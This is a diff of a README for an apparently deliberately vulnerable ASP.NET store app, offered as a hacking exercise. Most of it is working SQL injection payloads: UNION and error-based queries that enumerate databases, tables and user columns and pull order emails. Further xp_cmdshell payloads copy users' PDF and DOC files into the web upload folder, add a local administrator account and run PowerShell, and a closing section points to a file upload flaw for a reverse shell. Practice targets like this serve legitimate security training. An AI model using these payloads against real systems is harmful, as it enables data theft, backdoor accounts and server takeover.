MunroRaymaker/MvcProductStore/README.md

 Try if you can inject some code in the search field.
 Here are some examples that might get you started:
     ' OR 1=1 UNION SELECT 99, @@version, 'http://foo.gif' --
+	x' UNION SELECT 99, @@version, 'http://foo.gif' --
     ' OR 1=1 UNION SELECT 99, system_user, 'http://foo.gif' --
-    ' OR 1=1 UNION SELECT 99, DB_NAME(), 'http://foo.gif' --
+	' OR 1=1 UNION SELECT 99, name, 'http://foo.gif' FROM MvcProductStore..sysobjects WHERE xtype = 'U' -- (all tables)
-    ' OR 1=1 UNION SELECT 99, name, 'http://foo.gif' FROM master..sysdatabases --
+    ' OR 1=1 UNION SELECT 99, DB_NAME(), 'http://foo.gif' --  (database name)
-    ' OR 1=1 UNION SELECT 99, name, 'http://foo.gif' FROM MvcProductStore..sysobjects WHERE xtype = 'U' --
+    ' OR 1=1 UNION SELECT 99, name, 'http://foo.gif' FROM master..sysdatabases -- (all databases)
-    ' OR 1=1 UNION SELECT 99, name, 'http://foo.gif' FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'AspNetUsers') --
+    ' OR 1=1 UNION SELECT 99, name, 'http://foo.gif' FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'AspNetUsers') -- (column names in table)

+	Error based injection (will dispkay server error) x' AND 1 IN (SELECT @@version) -- x' AND 1 IN (SELECT 'Extract:' + CAST((SELECT 1) as varchar(4096))) -- (replace select statement with the sql you want to execute) x' AND 1 IN (SELECT 'Extract:' + CAST((SELECT TOP 1 Email FROM Orders) as varchar(4096))) --

+	If xp_cmdshell is not available try:

+	EXEC sp_configure 'show advanced options', 1;
+	RECONFIGURE;
+	EXEC sp_configure 'xp_cmdshell', 1;
+	RECONFIGURE;

+	Then try this
+	x'; exec master..xp_cmdshell 'copy %HOMESHARE%\Fakturaer\*.pdf C:\Dev\Sandbox\MvcProductStore\MvcProductStore\Uploads'; --
+	x'; exec master..xp_cmdshell 'xcopy %HOMESHARE%\*.doc C:\Dev\Sandbox\MvcProductStore\MvcProductStore\Uploads /sy';

+	Output is not shown as this is a blind injection.

+	exec master..xp_cmdshell 'whoami.exe' (current username)
+	exec master..xp_cmdshell 'cd' (print working directory)

+	Add administrator
+	exec master..xp_cmdshell 'net user foobar Password123 /add'; --
+	exec master..xp_cmdshell 'net localgroups "Administrators" /add'; --

+	The above command adds a new local administrator to the remote server.
+That might help.
+	Alternatively you can redirect the output of the executed command to a database table and read the contents of the table through SQL injection!
+	You can create a table and store the output of a command to it with the following:

+	; create table #output (id int identity(1,1), output nvarchar(255) null);
+	; insert #output (output) exec @rc = master..xp_cmdshell 'dir c:';
+	; select * from #output where output is not null order by id;

+	Example
+	x'; create table hacker (id int identity(1,1), output nvarchar(255) null); -- x'; declare @rc nvarchar(255); insert into hacker (output) exec @rc = master..xp_cmdshell 'dir c:'; -- x' union select 99, output, 'http://foo.gif' from hacker where output is not null -- x'; drop table hacker --

+	Or combine this with the file upload vulnerability (see next section).

+	This prints the contents of local folder to dir_out.txt file x'; DECLARE @cmd sysname, @var sysname;SET @var = 'dir/p';SET @cmd = @var + ' > C:\Dev\Sandbox\MvcProductStore\MvcProductStore\Uploads\dir_out.txt';EXEC master..xp_cmdshell @cmd; --

+	More fun with powershell.
+See what services are running on the server: x'; DECLARE @cmd sysname, @var sysname;SET @var = 'PowerShell.exe -noprofile Get-Service';SET @cmd = @var + ' > C:\Dev\Sandbox\MvcProductStore\MvcProductStore\Uploads\dir_out.txt';EXEC master..xp_cmdshell @cmd; --

+### File Upload
+Customer service page has upload functionality which saves files in Uploads folder.
+Could be exploited for reverse shell upload.
+Seems like anything can be uploaded and directory browsing is enabled.

 ### Exploitation
 If we can get access to the server it's easy to upload your own shell code and have the website execute it.